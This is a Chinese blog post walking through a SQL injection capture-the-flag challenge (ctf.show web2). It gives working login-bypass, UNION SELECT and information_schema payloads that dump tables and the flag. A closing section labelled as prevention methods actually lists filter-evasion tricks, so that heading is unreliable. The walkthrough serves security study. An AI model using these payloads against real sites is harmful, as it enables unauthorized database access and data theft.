sql注入学习

已于 2023-04-02 00:11:31 修改
阅读量535 收藏 1
点赞数 1
分类专栏: 安全 问题及示例 文章标签: 学习 安全
于 2023-03-28 18:25:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XiaoXiao_RenHe/article/details/129817529
版权

1、靶场:ctf.show中WEB下第2题(web2)

2、sql注入过程示例

(1)、判断是否存在注入点

如下图所示,用户名输入 aaa' or 1=1 -- a,点击“登录”按钮,若可以登录成功,则存在注入点。

或者用户名处输入 aaa' or 1=1 #,点击“登录”按钮,若可以登录成功,则存在注入点。

  如下图所示,显示登录成功了!

 说明: -- a--a之间有个空格,是sql语句中的一种注释,即: -- 这里是注释内容 --

            #可以紧挨着有内容,是sql语句中的另一种注释,即: #这里是注释内容

(2)、是否有回显点

登录成功后,展示了ctfshow,尝试让这里显示其他内容。

F12查看用户名字段为username,密码为password,使用火狐浏览器的HackBar工具尝试sql注入。

判断登录涉及的表有几个字段,order by 3时,登录显示信息正常,如下图所示:

username=aaa' or 1=1 order by 3 #&password='12'

 order by 4时,登录显示信息异常,如下图所示:

username=aaa' or 1=1 order by 4 #&password='12'

所以判断出,当前登录所涉及的表包含3个字段,如下图所示,使用  select 1,2,3 判断是否存在回显点。

username=aaa' union select 1,2,3 or 1=1 #&password='12'

(3)、查询该网站有几个表

username=aaa'  union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) ,3 or 1=1  #&password='12'

或 
username=aaa'  union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1) ,3 or 1=1  #&password='12'

username=aaaa'  union select 1,(select table_name from information_schema.tables where table_schema=database() limit 1,1) ,3 or 1=1  #&password='12'

如下图所示,查询到2个表:

  (4)、查询flag表的字段

username=aaa'  union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag') ,3 or 1=1  #&password='12'

或
username=a'  union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1) ,3 or 1=1  #&password='12'

如下图所示, 查询到flag表字段只有1个也是flag。

 (5)、查询表内容(查找到flag)

username=aaa'  union select 1,(select group_concat(flag) from flag) ,3 or 1=1  #&password='12'

3、其他尝试

尝试将注入语句先后顺序调整,看看效果。

username=aaa'  or 1=1  union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) ,3 #&password='12'

 如下图所示,这里的回显点不止显示1条数据。

4、防止sql注入的方法

(1)、后台过滤掉or关键字、空格

——select * from user where name=admin' or 1=1#&password=123

——可以替换为:select * from user where name=admin'||1=1#&password=123

——可以替换为:select * from user where name=admin'||true#&password=123

——可以替换为:select * from user where name=admin'||%091=1#&password=123

注意空格可以用tab键(%09)、换行(%0a)、回车(%0d)、空格(%a0)、注释符(/**/)替换。

(2)、后台过滤掉了'单引号

——select * from user where id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='database1' ,3

——单引号替换为双引号:

select * from user where id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="database1" ,3

XiaoXiao_RenHe
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入学习
07-29
SQL注入是黑客入门的基础,非常重要。这是学习SQL注入的基本步骤
sql注入详解
热门推荐
yy
05-05 19万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入学习总结
YouthBelief的博客
10-09 4539
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入中常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结 1.sql注入原理 web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句中执行,从而被黑客利用进行数据库的增删查改或写入webshell。 2.sql注入的分类 根据数据类型分为:数字型、字符型、搜索型。 根据提交方式分为:get型 post型 c
sql注入 学习笔记
weixin_45568648的博客
10-05 2729
自学sql注入
sql注入学习-知识点大合集
weixin_49349476的博客
05-27 1578
SQL注入是Web应用程序攻击中最常见的攻击方式之一,是影响Web安全的主要问题之一
sql注入基础学习
最新发布
qq_48257021的博客
03-10 1190
4.判断一下数据库中的表,网址后加上:and (select count(*) from admin) 0返回正常,说明存在admin表。and (select count(*) from admin where ascii(substr(name,2,1))>=100)=1 结果为100,即字符d,重复上述过程,可以判断出帐号为admin。and (select count(*) from admin where ascii(substr(pwd,1,1))>=97)=1,返回正常,为字符a。
SQL注入学习笔记
qq_52560434的博客
09-26 1748
SQL注入大致的方法步骤原理思路注入类型SQL注入相关例题 原理 SQL注入,简单的说就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,最终使web服务器执行恶意命令的过程。 思路 (1)找注入点,构造特殊语句 (2)收集后台数据库信息,判断数据库类型,确定注入的方式。 (3)通过构造的特殊语句返回的结果,查询表名、列名、字段名以及字段值,猜解用户名和密码。 (4)找到后台可以登录的地址,进一步提权,入侵Web服务器和数据库服务器等。 注入类型 这里按照执行之后的效果来分,一
SQL注入学习记录
http://www.lunatic007.top/
03-27 3622
分类 按照请求方法分类:GET、POST 按照SQL数据类型分类:整型注入、字符型注入 其他的数据类型:报错注入、双注入(用到了两个SELECT)、 时间盲注、Cookie注入、User-Agent注入 【盲注】:时间盲注、布尔盲注 注入方法 1、判断是否有注入(判断是否未严格校验)-->第一要素 1)可控参数的改变能否影响页面的显示结果 2)输入的SQL语句是否能报错---能通过数据库的报错,看到数据库的一些语句痕迹 (select username,password form
SQL注入学习之union联合查询注入
LTNSLALALA的博客
06-13 4158
文章主要是对SQL注入中基于union联合查询注入方式的实践记录。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
sql注入学习进阶篇
12-16
sql注入学习进阶篇
sql注入学习入门篇
12-16
sql注入学习入门篇
sql注入学习高级篇
12-16
sql注入学习高级篇
pageoffice使用过程遇到的问题及解决方法
XiaoXiao_RenHe的专栏
05-10 6万+
1、pageoffice打开后每次变成系统的登录页面 2、有的电脑上打开显示4页,个别电脑打开该文件显示5页 3、打开word报告,报jQuery未定义错误,需要升级pageoffice版本 4、您的Office软件不支持这个命令,或者这个命令在打开文档时已被禁止 5、本地安装office2016版本时,报保存至服务器失败问题解决方法 6、2016保存文件报“保存到Web服务器失败”问题,访问文件权限问题 7、规格打开excel重复提醒安装pageoffice问题
当前的安全设置不允许从该位置下载文件--解决方法
XiaoXiao_RenHe的专栏
02-23 1万+
解决ftp下载文件时,报 当前的安全设置不允许从该位置下载文件 问题
Word文件转为PDF格式后为什么字体会有改变?
XiaoXiao_RenHe的专栏
10-10 1万+
word转pdf字体改变解决方法:勾选“将字体嵌入文件”。
服务器间文件同步工具Syncthing配置注意点汇总
XiaoXiao_RenHe的专栏
03-02 1万+
1、Syncthing本地服务器配置 2、Syncthing远程服务器配置 3、Syncthing实际应用配置项说明
SQL注入学习对我们有什么作用
06-12
学习SQL注入对我们有以下作用: 1. 提高安全意识:学习SQL注入可以帮助我们了解Web应用程序的安全漏洞,提高我们的安全意识,从而更好地保护自己的网络安全。 2. 发现Web应用程序漏洞:学习SQL注入可以帮助我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值